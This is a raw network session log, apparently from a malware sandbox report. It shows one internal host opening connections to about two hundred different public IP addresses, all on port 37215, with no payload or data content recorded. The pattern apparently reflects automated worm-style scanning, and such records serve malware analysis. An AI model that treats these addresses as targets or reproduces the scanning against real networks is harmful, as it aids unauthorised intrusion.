                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13547192.168.2.1334164157.189.98.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13548192.168.2.135775041.163.17.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13549192.168.2.1334294197.46.80.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13550192.168.2.1340266157.76.139.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13551192.168.2.134589684.172.90.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13552192.168.2.134594241.224.149.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13553192.168.2.1339064184.188.18.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13554192.168.2.1346078157.87.161.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13555192.168.2.1344476157.213.217.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13556192.168.2.1354776157.144.132.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13557192.168.2.1354582100.24.160.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13558192.168.2.1335860157.121.64.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13559192.168.2.1340450197.210.193.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13560192.168.2.133955841.203.212.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13561192.168.2.1333492157.76.186.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13562192.168.2.135494841.57.61.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13563192.168.2.1340838168.247.247.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13564192.168.2.133425241.103.143.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13565192.168.2.1333062197.54.96.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13566192.168.2.134602641.91.16.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13567192.168.2.1358602157.240.40.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13568192.168.2.1338670110.0.13.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13569192.168.2.134501041.23.33.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13570192.168.2.1347806211.198.176.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13571192.168.2.1338662111.200.33.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13572192.168.2.1351820157.137.124.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13573192.168.2.136043441.61.219.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13574192.168.2.1345384197.244.224.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13575192.168.2.1340652157.70.226.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13576192.168.2.1339984157.2.144.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13577192.168.2.134984841.101.138.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13578192.168.2.13525484.7.101.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13579192.168.2.1354254157.82.22.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13580192.168.2.1346454197.216.174.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13581192.168.2.1354060157.94.229.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13582192.168.2.1358652183.129.22.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13583192.168.2.1347958197.240.75.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13584192.168.2.1357538157.82.126.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13585192.168.2.135215041.130.8.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13586192.168.2.134141841.173.69.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13587192.168.2.1347916197.2.221.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13588192.168.2.1348638157.218.142.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13589192.168.2.134756241.145.150.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13590192.168.2.134276041.77.240.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13591192.168.2.1340098157.189.161.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13592192.168.2.135288876.188.104.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13593192.168.2.1351866157.1.85.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13594192.168.2.1343148157.156.3.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13595192.168.2.134802240.74.170.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13596192.168.2.1338946197.58.103.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13597192.168.2.133714041.100.54.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13598192.168.2.136007441.17.94.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13599192.168.2.1351494203.223.148.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13600192.168.2.134170641.147.144.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13601192.168.2.1347094197.15.78.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13602192.168.2.1348964157.58.154.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13603192.168.2.1351050157.84.200.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13604192.168.2.1342980208.181.118.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13605192.168.2.135087841.108.240.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13606192.168.2.1351284197.36.200.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13607192.168.2.1346190144.141.208.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13608192.168.2.1337688197.5.218.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13609192.168.2.1334608197.19.254.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13610192.168.2.1340262157.96.138.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13611192.168.2.134033441.104.191.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13612192.168.2.1338988157.43.135.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13613192.168.2.135693041.95.56.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13614192.168.2.1355158197.134.75.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13615192.168.2.135053841.70.228.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13616192.168.2.1335482197.36.217.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13617192.168.2.1338548157.130.106.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13618192.168.2.136052041.3.202.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13619192.168.2.135030050.125.99.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13620192.168.2.1347852121.98.113.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13621192.168.2.1342432197.30.12.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13622192.168.2.1351758157.236.183.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13623192.168.2.1344310102.26.186.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13624192.168.2.1359586197.216.230.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13625192.168.2.1360250197.198.50.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13626192.168.2.1351340197.31.238.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13627192.168.2.1349742157.146.123.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13628192.168.2.1354690100.56.87.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13629192.168.2.1355446197.250.108.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13630192.168.2.135310841.200.4.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13631192.168.2.1355734197.101.101.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13632192.168.2.134673442.64.139.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13633192.168.2.1335410157.3.235.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13634192.168.2.135946096.92.115.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13635192.168.2.1335954167.176.66.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13636192.168.2.1339244197.180.225.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13637192.168.2.1336284197.80.208.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13638192.168.2.1350414197.240.23.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13639192.168.2.134781841.16.103.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13640192.168.2.1359988157.244.247.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13641192.168.2.135630441.34.225.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13642192.168.2.1353946197.162.251.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13643192.168.2.1354852157.124.85.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13644192.168.2.1354484197.20.90.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13645192.168.2.133459034.79.237.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13646192.168.2.134627641.93.74.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13647192.168.2.1340830157.6.116.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13648192.168.2.1346952157.128.86.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13649192.168.2.1350040197.6.13.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13650192.168.2.1348898157.76.139.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13651192.168.2.1336100157.1.52.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13652192.168.2.1347534157.117.99.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13653192.168.2.1342026157.73.130.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13654192.168.2.1335410197.144.207.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13655192.168.2.1345824197.61.32.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13656192.168.2.135670441.15.63.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13657192.168.2.1349496157.180.160.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13658192.168.2.135570685.189.14.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13659192.168.2.1334170197.228.207.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13660192.168.2.1358114101.241.226.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13661192.168.2.1334346162.143.237.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13662192.168.2.1344494124.110.198.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13663192.168.2.135820841.158.25.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13664192.168.2.1357000197.95.49.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13665192.168.2.1335772128.237.232.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13666192.168.2.136020041.171.165.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13667192.168.2.1346930197.203.179.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13668192.168.2.1351680157.174.15.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13669192.168.2.133996277.227.6.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13670192.168.2.134660841.235.121.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13671192.168.2.1344908157.115.7.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13672192.168.2.1353232157.57.223.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13673192.168.2.134258241.38.40.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13674192.168.2.1344964157.140.195.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13675192.168.2.133751694.147.85.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13676192.168.2.134238041.73.222.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13677192.168.2.133430838.251.48.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13678192.168.2.135546618.233.165.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13679192.168.2.1338848197.171.171.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13680192.168.2.1352454197.164.78.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13681192.168.2.135510841.131.217.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13682192.168.2.134374441.202.236.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13683192.168.2.135292841.1.134.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13684192.168.2.1344646146.10.102.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13685192.168.2.1340538157.225.185.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13686192.168.2.135297271.166.143.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13687192.168.2.135804441.217.158.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13688192.168.2.1346004197.17.234.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13689192.168.2.135943841.182.254.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13690192.168.2.1359982197.118.253.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13691192.168.2.1356736112.6.252.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13692192.168.2.1338560197.159.84.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13693192.168.2.1355738197.173.237.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13694192.168.2.1338634217.185.3.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13695192.168.2.135127041.163.236.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13696192.168.2.136056885.212.68.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13697192.168.2.134351441.93.94.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13698192.168.2.1337378197.12.163.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13699192.168.2.133877241.197.222.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13700192.168.2.1342902157.124.167.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13701192.168.2.135864052.136.26.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13702192.168.2.133549041.223.50.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13703192.168.2.135518241.48.6.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13704192.168.2.135797241.187.12.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13705192.168.2.1341498112.114.58.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13706192.168.2.13419324.126.53.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13707192.168.2.134015841.151.97.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13708192.168.2.1336696117.89.108.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13709192.168.2.1333476106.219.205.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13710192.168.2.1344270157.118.216.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13711192.168.2.134934683.124.241.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13712192.168.2.1335176197.226.56.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13713192.168.2.135596641.50.6.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13714192.168.2.134535441.192.16.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13715192.168.2.135773041.23.239.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13716192.168.2.134924841.173.242.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13717192.168.2.1338342197.171.230.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13718192.168.2.1340662197.239.169.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13719192.168.2.134354264.34.14.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13720192.168.2.134463419.206.48.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13721192.168.2.1344134157.105.96.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13722192.168.2.1337828157.122.167.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13723192.168.2.1350088197.239.72.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13724192.168.2.135477677.194.229.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13725192.168.2.1338704157.61.35.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13726192.168.2.1349356157.156.190.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13727192.168.2.133377641.239.17.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13728192.168.2.1354010201.204.14.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13729192.168.2.136095841.243.22.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13730192.168.2.1352172212.153.110.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13731192.168.2.135373241.205.59.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13732192.168.2.1351180197.30.65.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13733192.168.2.134411241.254.217.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13734192.168.2.135579677.225.233.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13735192.168.2.1349834197.10.50.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13736192.168.2.1355638197.10.86.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13737192.168.2.1359746165.94.125.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13738192.168.2.1358788157.172.90.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13739192.168.2.1339188116.209.132.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13740192.168.2.134093841.56.214.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13741192.168.2.134306650.116.229.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13742192.168.2.1353056114.97.178.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13743192.168.2.134259861.218.149.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13744192.168.2.1339698157.83.25.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13745192.168.2.1351908218.208.206.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13746192.168.2.1348298103.67.221.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13747192.168.2.1360176197.42.111.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13748192.168.2.135242241.16.113.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13749192.168.2.135864447.128.102.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13750192.168.2.134089841.243.184.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13751192.168.2.1356680197.217.32.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13752192.168.2.1359176157.43.80.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13753192.168.2.1359300101.100.179.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13754192.168.2.1352620197.70.51.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13755192.168.2.1336956197.189.165.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
